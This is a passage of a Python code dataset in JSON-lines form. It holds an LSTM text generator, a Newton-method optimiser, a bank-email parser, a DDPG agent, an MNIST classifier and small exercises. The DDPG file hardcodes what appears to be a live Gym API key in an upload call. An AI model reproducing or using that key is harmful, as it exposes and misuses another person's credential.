functions\nword_to_index, index_to_word = dictionary_lookups(word_model)\n\n# VECTORIZE WORDS\n# ----------------\n\nprint('\\nVectorizing words...')\n# define the shape of input & output matrices\n# input shape (no sentences, max-sentence-size)\ntrain_input = np.zeros([len(sentences), max_sentence_len], dtype=np.int32)\n\n# output shape (no sentences, max-sentence-size, 1)\ntrain_output = np.zeros([len(sentences), max_sentence_len, 1], dtype=np.int32)\n\n# populate model vectors with word embedding data\ntrain_input, train_output = vectorize_words(sentences, train_input, train_output, word_to_index)\n\nprint('\\ntrain_input shape:', train_input.shape)\nprint('train_output shape:', train_output.shape)\n\n# MODEL SETUP\n# ------------------\nprint('\\nConstructing Model...')\n\n# define the model layers\nmodel_input = Input(shape=(None,))\nmodel_embed = Embedding(input_dim=vocab_size, output_dim=embedding_size, weights=[embed_weights])\nmodel_lstm_1 = LSTM(units=embedding_size, return_sequences=True, return_state=False)\nmodel_dropout_1 = Dropout(0.2)\nmodel_lstm_2 = LSTM(units=embedding_size, return_sequences=True, return_state=False)\nmodel_dropout_2 = Dropout(0.2)\nmodel_dense = TimeDistributed(Dense(units=vocab_size))\nmodel_activation = Activation('softmax')\n# Connect layers\nembedded = model_embed(model_input)\nlstm_1_output = model_lstm_1(embedded)\ndropout_1_output = model_dropout_1(lstm_1_output)\nlstm_2_output = model_lstm_2(dropout_1_output)\ndropout_2_output = model_dropout_2(lstm_2_output)\ndense_output = model_dense(dropout_2_output)\nmodel_output = model_activation(dense_output)\n\n\n# Define the model\nprimary_model = Model(model_input, model_output)\n\n# Define optimizer\nrms_prop = RMSprop(lr=0.001, rho=0.9, epsilon=None, decay=0.0)\n\n\n# Define custom evaluation metrics\ndef perplexity(y_true, y_pred):\n cross_entropy = K.sparse_categorical_crossentropy(y_true, y_pred)\n perplexity = K.pow(2.0, cross_entropy)\n # perplexity = 2 ** cross_entropy\n return perplexity\n\n\ndef crossentropy(y_true, y_pred):\n return K.sparse_categorical_crossentropy(y_true, y_pred)\n\n\n# Compile model\nprimary_model.compile(\n optimizer=rms_prop,\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy', crossentropy, perplexity])\n\n# print summary of model layers\nprint(primary_model.summary())\n\n# TRAINING SETUP\n# --------------\nprint(\"\\nVocab size: %d\" % vocab_size)\nprint(\"Embedding size: %d\" % embedding_size)\n\nbatch_size = 32\nepochs = 25\nvalidation_split = 0.2\nprint(\"\\nTraining in batches of: %d\" % batch_size)\nprint(\"Training epochs: %d\" % epochs)\n\n# start point for generated text\nstart_words = ['the', 'there', 'from', 'have', 'can',\n 'engine', 'body', 'speed', 'elegance', 'safety',\n 'fun', 'love', 'excite', 'joy', 'curious', ]\n\n\n# apply temperature to each model sample\ndef temp_sample(predictions, temperature=1.0):\n # value 0 return argmax sampling\n if temperature <= 0:\n return np.argmax(predictions)\n predictions = np.asarray(predictions).astype('float64')\n predictions = np.log(predictions) / temperature\n exp_predictions = np.exp(predictions)\n predictions = exp_predictions / np.sum(exp_predictions)\n probability = np.random.multinomial(1, predictions, 1)\n return np.argmax(probability)\n\n\n# generate sentence one word at a time - limiting to 10 words\ndef generate_next_word(text, temp, sentence_length=10):\n word_indices = [word_to_index(word) for word in text.lower().split()]\n for n in range(sentence_length):\n prediction = primary_model.predict(x=np.array(word_indices))\n index = temp_sample(prediction[0, -1, :], temperature=temp)\n word_indices.append(index)\n return ' '.join(index_to_word(index) for index in word_indices)\n\n\n# writes prediction to file for each epoch\ndef on_epoch_end(epoch, _):\n # declare csv objects for both sampling styles\n wr = csv.writer(f, dialect='excel', lineterminator='\\n')\n for text in start_words:\n sentence = generate_next_word(text, 0)\n wr.writerow(sentence)\n\n\n# TRAIN MODEL\n# -----------\nprint('\\nTraining Start-Time: ', time.ctime(time.time()))\n\n# calls function on every epoch end\ngenerate_callback = LambdaCallback(on_epoch_end=on_epoch_end)\n\n# writes training stats to file\ncsv_logger = CSVLogger(path + '/Logs/' + version_name + '.log')\n\nhistory = History()\n\nmodel_check = ModelCheckpoint(path + '/Models/' + version_name + '_.{epoch:02d}.hdf5',\n monitor='val_perplexity',\n verbose=1,\n save_best_only=False,\n save_weights_only=False,\n mode='auto',\n period=1)\n\nwith open(path + '/Output/' + version_name + '.csv', 'w') as f:\n hist = primary_model.fit(train_input,\n train_output,\n batch_size=batch_size,\n verbose=1,\n shuffle='batch',\n epochs=epochs,\n validation_split=validation_split,\n callbacks=[generate_callback, csv_logger, history])\n\nprint('\\nTraining Finish Time: ', time.ctime(time.time()))\n\n# SAVE MODEL\n# -----------\n\nwith open(path + '/Logs/' + version_name + '_train_history.pkl', 'wb') as file:\n pickle.dump(hist.history, file)\n\nprint(\"\\nSaving trained model...\")\nprimary_model.save(path + '/Models/' + version_name + '.h5')\n\nprint(\"\\nSaving model weights...\")\nprimary_model.save_weights(path + '/Models/' + version_name + '_weights.h5')\n\nprint(\"\\nSaving model to JSON...\")\nmodel_json_string = primary_model.to_json()\nwith open(path + '/Models/' + version_name + '.json', \"w\") as f_j:\n json.dump(json.loads(model_json_string), f_j, indent=4)\n\nprint(\"\\nAll done!\")\n","sub_path":"primary.py","file_name":"primary.py","file_ext":"py","file_size_in_byte":7339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"337831775","text":"from matplotlib import pyplot as plt\nimport numpy as np\nfrom tools import FirstDerivative, SecondDerivative, GetA, GetInverseMatrix\nfrom functions import fun2, fun1, fun3, fun4, fun5, fun6, fun7, fun8\n\ndef fun(x1, x2):\n return x1**2 + 25*x2**2\n\ndef display(x_range, y_range, function, a=1, X0=None, delta=0.01):\n if X0 is None:\n X0 = [5, 5]\n\n fig = plt.figure(figsize=(7, 7)) # 定义新的三维坐标轴\n ax3 = plt.axes(projection='3d')\n\n # 定义三维数据\n xx = np.arange(x_range[0], x_range[1], 0.5)\n yy = np.arange(y_range[0], y_range[1], 0.5)\n X, Y = np.meshgrid(xx, yy)\n Z = function(X, Y)\n\n ax3.contour(X, Y, Z, 20, zdim='z', offset=-2, cmap='rainbow') # 等高线图,要设置offset,为Z的最小值\n ax3.plot_wireframe(X, Y, Z, color='gray')\n\n X = np.array([[X0[0]], [X0[1]]])\n X_new = np.array([[float('inf')], [float('inf')]])\n\n count = 0\n grad_list = []\n fx = []\n\n while abs((X[0, 0] - X_new[0, 0]) ** 2 + (X[1, 0] - X_new[1, 0]) ** 2) > delta:\n if count != 0: # count=0的时候new还没有更新,不能将其值赋给X\n X = X_new\n\n fx.append(function(X[0, 0], X[1, 0]))\n grad = np.array(FirstDerivative(X[0, 0], X[1, 0], function)).reshape(2, 1) # 计算梯度\n grad_list.append(grad)\n\n # !!!!!!!!!!!!!如果此时梯度为零,说明此时点为驻点!!!!!!!!!!!!!!!\n if abs(grad[0, 0]) < 0.001 and abs(grad[1, 0]) < 0.001:\n # 如果给一个微小的扰动大于此时的值,那么认为此时为极小值点\n if function(X[0, 0] + delta, X[1, 0] + delta) > function(X[0, 0], X[1, 0]):\n print(\"最优点\")\n ax3.scatter3D(X[0, 0], X[1, 0], function(X[0, 0], X[1, 0]), c='y', label='最优点', s=50)\n break\n\n ax3.scatter3D(X[0, 0], X[1, 0], function(X[0, 0], X[1, 0]), c='g', s=50)\n\n second_derivative = SecondDerivative(X[0, 0], X[1, 0], function) # 求二阶导\n inverse_matrix = GetInverseMatrix(second_derivative) # 求二阶导矩阵的逆\n\n X_new = np.array(X) - a * np.matmul(inverse_matrix, grad) # a是下降的步长\n\n count += 1\n\n plt.pause(0.4)\n\n ax3.scatter3D(X_new[0, 0], X_new[1, 0], function(X_new[0, 0], X_new[1, 0]), c='r', label='最优点', s=50)\n\n if X_new[0] == float('inf') and X_new[1] == float('inf'):\n X_new = X\n\n if count == 0:\n count += 1\n print(\"一共迭代了{:}次\\n极小值点为({:.2f},{:.2f})\\n极小值为{:.2f}\"\n .format(count, float(X_new[0, 0]), float(X_new[1, 0]), float(function(X_new[0, 0], X_new[1, 0]))))\n print(grad_list)\n print(\"fx = \", fx)\n\n ax3.set_xlabel('x')\n ax3.set_ylabel('y')\n ax3.set_zlabel('z')\n ax3.set_title('3D contour')\n plt.show()\n\n\nif __name__ == \"__main__\":\n display((-5, 10), (-5, 7), fun, X0=[2, 2])\n","sub_path":"无约束优化方法/牛顿型方法.py","file_name":"牛顿型方法.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"210721300","text":"import argparse\nparser = argparse.ArgumentParser(description = 'Square a number')\nparser.add_argument(\"square\", help=\"display a square of a given number\",\n type=int)\ndef main():\n args = parser.parse_args()\n return args.square**2\n\nif __name__ == \"__main__\":\n main()","sub_path":"tests/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"100136323","text":"from bs4 import BeautifulSoup\n\n\nclass BoFA:\n def parse(self, transaction_html):\n soup = BeautifulSoup(transaction_html, \"html.parser\")\n\n amount_element = soup.find(\"td\", text=\" Amount: \")\n transaction_dict = {}\n\n if amount_element is not None:\n transaction_amount = amount_element.find_parent().find_all('td')[-1].next_element.strip()\n transaction_dict[\"amount\"] = transaction_amount\n else:\n return\n\n merchant_element = soup.find(\"td\", text=\" Merchant: \")\n\n if merchant_element is not None:\n transaction_merchant = merchant_element.find_parent().find_all('td')[-1].next_element.strip()\n transaction_dict[\"merchant\"] = transaction_merchant\n\n date_element = soup.find(\"td\", text=\" Transaction date: \")\n\n if date_element is not None:\n transaction_date = date_element.find_parent().find_all('td')[-1].next_element.strip()\n transaction_dict[\"date\"] = transaction_date\n\n transaction_dict[\"card\"] = \"BoFA Card\"\n\n return transaction_dict\n","sub_path":"gmail/api/card_parsers/bofa_parser.py","file_name":"bofa_parser.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"5946397","text":"from __future__ import print_function\n\n# Deep Deterministic Policy Gradient Method\n# David Silver et al.\n\n# implemented in plain Keras, by Qin Yongliang\n# 2017 01 13\n\n'''\nsummary\n\n0. s for state, a for action, r for reward,\n q for 'action_quality', or expectation of sum of discounted future reward.\n\n1. you have 2 network, Mr. actor and Mr. critic\n - Mr. actor generate actions: a = actor(s)\n - Mr. critic score (state,action) pairs: q = critic(s,a)\n\n >in literature, Mr. actor is function mu(s), Mr. critic is function Q(s,a)\n\n2. you improve Mr. critic by using Bellman equation, or what they call TD-learning\n - Q(s1,a1) := r1 + gamma * Q(s2,a2) where a2 = actor(s2)\n - train Mr. critic to predict the calculated Q(s1,a1) given s1 and a1, using gradient descent and MSE loss.\n\n3. after that, improve Mr. actor by gradient ascent w.r.t. Q(s,a)\n - a1_maybe = actor(s1), q1_maybe = critic(s1,a1_maybe)\n - therefore q1_maybe = critic(s1,actor(s1)). we want to increase q1_maybe!!\n - then figure out what is the gradient of actor w.r.t. q1_maybe,\n using tf.gradient() or by compositing Keras Models (as I did, to keep things clean)\n - then do gradient ascent to increase Mr. actor's actions' q-value\n\n4. to stabilize the whole learning process:\n - random sampling of training examples from replay memory\n - use 'target' networks that are copy of actor and critic,\n their weights gradually shift towards the weights of the real actor and critic\n to reduce self-correlation/oscillation (well, if you know control theory)\n - add noise to actor's output in the beginning of learning, to turn deterministic actions into probabilistic ones\n - that's basically it\n\n5. now go master the game of Gym\n'''\n\n'''\npersonal tricks:\n\ncheck the Residual Dense Unit, it works!\n'''\n\n# gym boilerplate\nimport numpy as np\nimport gym\nfrom gym import wrappers\nfrom gym.spaces import Discrete, Box\n\n# keras boilerplate: the simplest way to neural networking\nfrom keras.models import *\nfrom keras.layers import *\nfrom keras.optimizers import *\nimport keras\nfrom math import *\nimport random\nimport keras.backend as K\nimport time\n\nfrom collections import deque\n\nfrom task import Task\n\n# replay buffer per http://pemami4911.github.io/blog/2016/08/21/ddpg-rl.html\nclass rpm(object):\n #replay memory\n def __init__(self,buffer_size):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n\n def add(self, tup):\n experience = tup\n if self.count < self.buffer_size:\n self.buffer.append(experience)\n self.count += 1\n else:\n self.buffer.popleft()\n self.buffer.append(experience)\n\n def size(self):\n return self.count\n\n def sample_batch(self, batch_size):\n '''\n batch_size specifies the number of experiences to add\n to the batch. If the replay buffer has less than batch_size\n elements, simply return all of the elements within the buffer.\n Generally, you'll want to wait until the buffer has at least\n batch_size elements before beginning to sample from it.\n '''\n batch = []\n\n if self.count < batch_size:\n batch = random.sample(self.buffer, self.count)\n else:\n batch = random.sample(self.buffer, batch_size)\n\n item_count = len(batch[0])\n res = []\n for i in range(item_count):\n k = np.array([item[i] for item in batch])\n if len(k.shape)==1: k = k.reshape(k.shape+(1,))\n res.append(k)\n return res\n\n# residual dense unit\ndef resdense(features):\n def unit(i):\n hfeatures = max(4,int(features/4))\n\n ident = i\n i = Dense(features,activation='tanh')(i)\n\n ident = Dense(hfeatures)(ident)\n ident = Dense(features)(ident)\n\n return add([ident,i])\n return unit\n\nclass nnagent(object):\n def __init__(self,\n \ttask,\n \tdiscount_factor,\n \toptimizer\n ):\n self.rpm = rpm(1000000) # 1M history\n \n\n self.inputdims = task.state_size\n # assume observation_space is continuous\n\n # if isinstance(action_space,Box): # if action space is continuous\n\n low = task.action_low\n high = task.action_high\n\n num_of_actions = task.action_size\n\n self.action_bias = (high+low)/2.\n self.action_multiplier = high - self.action_bias\n\n # say high,low -> [2,7], then bias -> 4.5\n # mult = 2.5. then [-1,1] multiplies 2.5 + bias 4.5 -> [2,7]\n\n self.is_continuous = True\n\n def clamper(env,actions):\n return np.clip(actions,a_max=env.action_high,a_min=env.action_low)\n\n self.clamper = clamper\n # else:\n # num_of_actions = action_space.n\n\n # self.action_bias = .5\n # self.action_multiplier = .5 # map (-1,1) into (0,1)\n\n # self.is_continuous = False\n\n self.outputdims = num_of_actions\n\n self.discount_factor = discount_factor\n self.optimizer = optimizer\n\n ids,ods = self.inputdims,self.outputdims\n self.actor = self.create_actor_network(ids,ods)\n self.critic, self.frozen_critic = self.create_critic_network(ids,ods)\n\n print('inputdims:{}, outputdims:{}'.format(ids,ods))\n print('actor network:')\n self.actor.summary()\n print('critic network:')\n self.critic.summary()\n\n # target networks: identical copies of actor and critic\n self.actor_target = self.create_actor_network(ids,ods)\n self.critic_target, self.frozen_critic_target = self.create_critic_network(ids,ods)\n\n self.replace_weights(tau=1.)\n\n # now the dirty part: the actor trainer --------------------------------\n\n # explaination of this part is written in the train() method\n\n s_given = Input(shape=(self.inputdims,))\n a1_maybe = self.actor(s_given)\n q1_maybe = self.frozen_critic([s_given,a1_maybe])\n # frozen weight version of critic. so we can train only the actor\n\n actor_trainer = Model(input=s_given,output=q1_maybe)\n\n # use negative of q1_maybe as loss (so we can maximize q by minimizing the loss)\n def neg_q1(y_true,y_pred):\n return - y_pred # neat!\n\n actor_trainer.compile(optimizer=self.optimizer,loss=neg_q1)\n self.actor_trainer = actor_trainer\n # dirty part ended -----------------------------------------------------\n\n # (gradually) replace target network weights with online network weights\n def replace_weights(self,tau=0.002):\n theta_a,theta_c = self.actor.get_weights(),self.critic.get_weights()\n theta_a_targ,theta_c_targ = self.actor_target.get_weights(),self.critic_target.get_weights()\n\n # mixing factor tau : we gradually shift the weights...\n theta_a_targ = [theta_a[i]*tau + theta_a_targ[i]*(1-tau) for i in range(len(theta_a))]\n theta_c_targ = [theta_c[i]*tau + theta_c_targ[i]*(1-tau) for i in range(len(theta_c))]\n\n self.actor_target.set_weights(theta_a_targ)\n self.critic_target.set_weights(theta_c_targ)\n\n # a = actor(s) : predict actions given state\n def create_actor_network(self,inputdims,outputdims):\n inp = Input(shape=(inputdims,))\n i = inp\n i = resdense(32)(i)\n i = resdense(32)(i)\n i = resdense(64)(i)\n i = resdense(outputdims)(i)\n # map into (0,1)\n i = Activation('tanh')(i)\n # map into action_space\n i = Lambda(lambda x:x * self.action_multiplier + self.action_bias)(i)\n\n out = i\n model = Model(input=inp,output=out)\n model.compile(loss='mse',optimizer=self.optimizer)\n return model\n\n # q = critic(s,a) : predict q given state and action\n def create_critic_network(self,inputdims,actiondims):\n inp = Input(shape=(inputdims,))\n act = Input(shape=(actiondims,))\n i = merge([inp,act],mode='concat')\n\n i = resdense(64)(i)\n i = resdense(32)(i)\n i = resdense(32)(i)\n i = resdense(1)(i)\n out = i\n model = Model(input=[inp,act],output=out)\n model.compile(loss='mse',optimizer=self.optimizer)\n\n # now we create a frozen_model,\n # that uses the same layers with weights frozen when trained.\n for i in model.layers:\n i.trainable = False # froze the layers\n\n frozen_model = Model(input=[inp,act],output=out)\n frozen_model.compile(loss='mse',optimizer=self.optimizer)\n\n return model,frozen_model\n\n def train(self,verbose=1):\n memory = self.rpm\n critic,frozen_critic = self.critic,self.frozen_critic\n actor = self.actor\n batch_size = 64\n\n if memory.size() > batch_size:\n #if enough samples in memory\n\n # sample randomly a minibatch from memory\n [s1,a1,r1,isdone,s2] = memory.sample_batch(batch_size)\n # print(s1.shape,a1.shape,r1.shape,isdone.shape,s2.shape)\n\n # a2_targ = actor_targ(s2) : what will you do in s2, Mr. old actor?\n a2 = self.actor_target.predict(s2)\n\n # q2_targ = critic_targ(s2,a2) : how good is action a2, Mr. old critic?\n q2 = self.critic_target.predict([s2,a2])\n\n # if a2 is q2-good, then what should q1 be?\n # Use Bellman Equation! (recursive definition of q-values)\n # if not last step of episode:\n # q1 = (r1 + gamma * q2)\n # else:\n # q1 = r1\n\n q1_target = r1 + (1-isdone) * self.discount_factor * q2\n # print(q1_target.shape)\n\n # train the critic to predict the q1_target, given s1 and a1.\n critic.fit([s1,a1],q1_target,\n batch_size=batch_size,\n nb_epoch=1,\n verbose=verbose,\n shuffle=False\n )\n\n # now the critic can predict more accurate q given s and a.\n # thanks to the Bellman equation, and David Silver.\n\n # with a better critic, we can now improve our actor!\n\n if False: # the following part is for explaination purposes\n\n # a1_pred = actor(s1) : what will you do in s1, Mr. actor?\n a1_maybe = actor.predict(s1)\n # this action may not be optimal. now let's ask the critic.\n\n # what do you think of Mr. actor's action on s1, Mr. better critic?\n q1_maybe = critic.predict([s1,a1_maybe])\n\n # what should we do to the actor, to increase q1_maybe?\n # well, calculate the gradient of actor parameters\n # w.r.t. q1_maybe, then do gradient ascent.\n\n # so let's build a model that trains the actor to output higher q1_maybe values\n\n s_given = Input(shape=(self.inputdims,))\n a1_maybe = actor(s_given)\n q1_maybe = frozen_critic([s_given,a1_maybe])\n # frozen weight version of critic. so we only train the actor\n\n actor_trainer = Model(input=s_given,output=q1_maybe)\n\n # use negative of q1_maybe as loss (so we can maximize q by minimizing the loss)\n def neg_q1(y_true,y_pred):\n return - y_pred # neat!\n\n actor_trainer.compile(optimizer=self.optimizer,loss=neg_q1)\n\n else: # the actor_trainer is already initialized in __init__\n actor_trainer = self.actor_trainer\n\n actor_trainer.fit(s1,\n np.zeros((batch_size,1)), # useless target label\n batch_size=batch_size,\n nb_epoch=1,\n verbose=verbose,\n shuffle=False\n )\n\n # now both the actor and the critic have improved.\n self.replace_weights()\n\n else:\n pass\n # print('# no enough samples, not training')\n\n def feed_one(self,tup):\n self.rpm.add(tup)\n\n # gymnastics\n def play(self,env,max_steps=-1,realtime=False,render=True,noise_level=0.): # play 1 episode\n max_steps = max_steps if max_steps > 0 else 5000\n steps = 0\n total_reward = 0\n\n # stack a little history to ensure markov property\n # LSTM will definitely be used here in the future...\n global que # python 2 quirk\n que = np.zeros((self.inputdims,),dtype='float32') # list of recent history actions\n\n def quein(observation):\n global que # python 2 quirk\n length = que.shape[0]\n que = np.hstack([que,observation])[-length:]\n\n # what the agent see as state is a stack of history observations.\n\n observation = env.reset()\n quein(observation) # quein o1\n lastque = que.copy() # s1\n\n while True and steps <= max_steps:\n steps +=1\n\n # add noise to our actions, since our policy by nature is deterministic\n exploration_noise = np.random.normal(loc=0.,scale=noise_level,size=(self.outputdims,))\n\n action = self.act(lastque) # a1\n action += exploration_noise\n action = self.clamper(env,action)\n\n # o2, r1,\n observation, reward, done = env.step(action)\n\n # d1\n isdone = 1 if done else 0\n total_reward += reward\n\n quein(observation) # quein o2\n nextque = que.copy() # s2\n\n # feed into replay memory\n self.feed_one((lastque,action,reward,isdone,nextque)) # s1,a1,r1,isdone,s2\n\n lastque = nextque\n\n # if render and (steps%10==0 or realtime==True): env.render()\n if done :\n break\n\n verbose= 2 if steps==1 else 0\n self.train(verbose=verbose)\n\n print('episode done in',steps,'steps, total reward',total_reward)\n return\n\n # one step of action, given observation\n def act(self,observation):\n actor = self.actor\n obs = np.reshape(observation,(1,len(observation)))\n actions = actor.predict([obs])[0]\n return actions\n\nclass playground(object):\n def __init__(self,envname):\n self.envname=envname\n env = gym.make(envname)\n self.env = env\n\n self.monpath = './experiment-'+self.envname\n\n def wrap(self):\n from gym import wrappers\n self.env = wrappers.Monitor(self.env,self.monpath,force=True)\n\n def up(self):\n self.env.close()\n gym.upload(self.monpath, api_key='sk_ge0PoVXsS6C5ojZ9amTkSA')\n\n# p = playground('Pendulum-v0')\n\ntarget_pos = np.array([0., 0., 10.])\ntask= Task(target_pos = target_pos)\nagent = nnagent(task,\ndiscount_factor=.995,\noptimizer=RMSprop()\n)\n\ndef r(ep):\n e = task\n for i in range(ep):\n noise_level = max(3e-2,(50.-i)/50.)\n print('ep',i,'/',ep,'noise_level',noise_level)\n agent.play(e,max_steps=1000,noise_level=noise_level)\n\n\nr(100)","sub_path":"Quadcopter /nnagent/Pendulum-v0.py","file_name":"Pendulum-v0.py","file_ext":"py","file_size_in_byte":14918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"11437665","text":"import numpy as np\r\nimport random\r\n\r\ndef gridGen(image, things_dict, gridShape, end = None):\r\n imageHeight, imageWidth = image.shape[:2]\r\n gridWidth, gridHeight = gridShape\r\n grid = np.zeros((gridHeight, gridWidth), np.uint8)\r\n things_dict_temp = things_dict.copy()\r\n if end:\r\n del things_dict_temp[end[0]]\r\n\r\n for key in things_dict_temp:\r\n thing = things_dict_temp[key]\r\n xBoundList = [int(imageWidth / gridWidth * cnt) for cnt in range(gridWidth + 1)]\r\n yBoundList = [int(imageHeight / gridHeight * cnt) for cnt in range(gridHeight + 1)]\r\n\r\n yVals, xVals = np.where(thing.mask == 255)\r\n for _ in range(int(len(xVals) / 5)):\r\n index = random.randint(0, len(xVals) - 1)\r\n xVal = xVals[index]\r\n yVal = yVals[index]\r\n\r\n gridX, gridY = _inGrid((xVals[index], yVals[index]), (xBoundList, yBoundList))\r\n\r\n if key[0] == 'G' and len(key) == 2:\r\n grid[gridY, gridX] = 1\r\n elif key[0] == 'R' and len(key) == 2:\r\n grid[gridY, gridX] = 2\r\n return grid\r\n\r\ndef locations(image, things_dict, gridShape):\r\n imageHeight, imageWidth = image.shape[:2]\r\n gridWidth, gridHeight = gridShape\r\n\r\n xBoundList = [int(imageWidth / gridWidth * cnt) for cnt in range(gridWidth + 1)]\r\n yBoundList = [int(imageHeight / gridHeight * cnt) for cnt in range(gridHeight + 1)]\r\n\r\n things_info = {}\r\n robot_info = None\r\n for key in things_dict:\r\n if key == 'ROBOT':\r\n thing_temp = things_dict[key]\r\n gridX, gridY = _inGrid((thing_temp.cX, thing_temp.cY), (xBoundList, yBoundList))\r\n\r\n robot_info = (gridY, gridX)\r\n else:\r\n thing_temp = things_dict[key]\r\n gridX, gridY = _inGrid((thing_temp.cX, thing_temp.cY), (xBoundList, yBoundList))\r\n\r\n things_info[key] = (gridY, gridX)\r\n\r\n return robot_info, things_info\r\n\r\ndef _inGrid(coord, bounds):\r\n xBoundList, yBoundList = bounds\r\n xVal, yVal = coord\r\n\r\n temp_x = xBoundList.copy()\r\n temp_y = yBoundList.copy()\r\n\r\n temp_x.append(xVal)\r\n temp_x.sort()\r\n gridX = temp_x.index(xVal) - 1\r\n\r\n temp_y.append(yVal)\r\n temp_y.sort()\r\n gridY = temp_y.index(yVal) - 1\r\n\r\n return gridX, gridY\r\n","sub_path":"Desk Arranging Robot/robotController_v20190828/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"77201751","text":"# -*- coding: utf-8 -*-\nclass Solution(object):\n def backspaceCompare(self, S, T):\n \"\"\"\n Solution: Stack\n Time Complexity: O(n)\n Space Complexity: O(n)\n Inspired By: MySELF!! (36ms, beat 15.08%)\n :type S: str\n :type T: str\n :rtype: bool\n \"\"\"\n def evaluate(target):\n stack = []\n for char in target:\n if char != '#':\n stack.append(char)\n elif stack:\n stack.pop()\n else:\n stack = []\n return stack\n\n return evaluate(S) == evaluate(T)\n\n","sub_path":"844. Backspace String Compare/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"609086947","text":"import cs50\n\ndef main():\n height = get_positive_int()\n print(\"\")\n for i in range(height):\n for j in range (height-1-i):\n print(\" \", end=\"\")\n for j in range (i+2):\n print(\"#\", end=\"\")\n print(\" \", end=\"\")\n for j in range (i+2):\n print(\"#\", end=\"\")\n print(\"\")\n print(\"\")\n \ndef get_positive_int():\n while True:\n print(\"Give me a positive int (1-23): \", end=\"\")\n height = cs50.get_int()\n if height >= 1 and height <= 23:\n break\n return height\n \nif __name__ == \"__main__\":\n main()","sub_path":"mario/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"497827838","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n#样本数据是60000*784\n#样本标签是60000*10\n\n#输入层784个神经元\n#输出层10个神经元\n#没有隐藏层\n\n#对于每一个样本来说,输入是1*784\n#对于每一个样本来说,权值是784*10\n#对于每一个样本来说,输出是1*784,输出例子2:00100000000\n\n#1、载入数据集\n'''one_hot 把标签转化为只有0和1的数据,也就是对于每一个样本,只有一位是1,其他全是0'''\n#写路径最好加原始字符串r\nmnist = input_data.read_data_sets(r\"E:\\project1\\MNIST_data\\MNIST_data\",one_hot=True)\n\n'''每个批次的大小(往神经网络中一次放入一个批次,一个批次一个批次的放入),这里的一个批次是100张图片'''\nbatch_size = 100\n\n#总共批次数量为n_batch\n'''//整数除法,返回不大于结果的最大整数'''\nn_batch = mnist.train.num_examples // batch_size\n\n#定义两个placeholder\nx = tf.placeholder(tf.float32,[None,784]) #样本集\ny = tf.placeholder(tf.float32,[None,10]) #样本标签集\n\n#创建一个简单的神经网络\nW = tf.Variable(tf.zeros([784,10])) #这个是针对每一个样本的权值,每一个样本有784个像素\nb = tf.Variable(tf.zeros([1,10])) #中间神经元个数是10,一般默认行���一\nprediction = tf.nn.softmax(tf.matmul(x,W)+b)\n\n#二次代价函数\n# loss = tf.reduce_mean(tf.square(y-prediction))\n#softmax交叉熵代价函数\n#这个函数就是softmax和交叉熵代价函数搭配使用,参数主要填的是label:真实标签,logits:预测标签\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=prediction))\n\n#使用梯度下降法\ntrain_step = tf.train.GradientDescentOptimizer(0.2).minimize(loss)\n\n#初始化变量\ninit = tf.global_variables_initializer()\n\n#结果存放在一个布尔型列表中\n'''\ntf.argmax(input, dimension, name=None) 返回最大数值的下标,dimension=0 按列找 ,dimension=1 按行找\n返回的是input中的最大值的索引号\n如果vector是一个向量,那就返回一个值,\n如果是一个矩阵,那就返回一个向量,这个向量的每一个维度都是相对应矩阵行的最大值元素的索引号。\n通常和tf.equal()一起使用,计算模型准确度\n'''\ncorrect_prediction = tf.equal(tf.argmax(y,1),tf.argmax(prediction,1))\n#求准确率\n'''correct_prediction原来的格式是bool,tf.cast将它的格式转化为float32位'''\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\n\nwith tf.Session() as sess:\n sess.run(init)\n for epoch in range(21):\n for batch in range(n_batch):\n batch_xs,batch_ys = mnist.train.next_batch(batch_size)\n sess.run(train_step,feed_dict={x:batch_xs,y:batch_ys})\n \n acc = sess.run(accuracy,feed_dict={x:mnist.test.images,y:mnist.test.labels})\n print(\"Iter \" + str(epoch) + \",Testing Accuracy \" + str(acc))\n\n\n\n\n\n\n","sub_path":"3.2MNIST数据集分类简单版本.py","file_name":"3.2MNIST数据集分类简单版本.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"243572317","text":"from re import compile as regex\nfrom knock50 import sentences\n\nexpand = regex(r'([.,:?!]|[A-Z]\\w+|(\\w\\.){2,})')\ninvisible = regex(r'[\\s\\b]+')\n\ndef split(line):\n line = expand.sub(r' \\1 ', line) # or src_obj.index\n return tuple(i for i in invisible.split(line) if len(i))\n\nif __name__ == '__main__':\n for sent in sentences():\n for tok in split(sent):\n print(tok)\n","sub_path":"zchen/chapter06/knock51.py","file_name":"knock51.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
